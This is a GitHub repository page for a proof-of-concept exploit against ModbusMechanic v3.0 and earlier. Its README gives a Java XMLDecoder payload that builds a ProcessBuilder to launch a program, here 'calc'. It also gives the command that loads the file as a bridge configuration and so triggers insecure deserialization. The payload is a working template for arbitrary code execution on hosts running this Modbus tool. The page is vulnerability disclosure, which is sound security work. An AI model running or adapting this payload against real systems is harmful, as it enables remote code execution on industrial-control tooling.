Skip to content

Gelcon/PoC-ModbusMechanic-3.0-Insecure-Deserialization-and-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 

Repository files navigation

ModbusMechanic V3.0 Insecure Deserialization & RCE

Affected Version: <= v3.0(latest release version)

Application: Here

Insecure Deserialization Vulnerability

<java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1" >
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start"/>
    </object>
</java>

Save the above code as PoC.xml file and put it in the project directory. Use the command "java -jar ModbusMechanic.jar -bridge PoC.xml" to start the jar package to trigger the vulnerability.

Exploit

image-20241024094827349

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors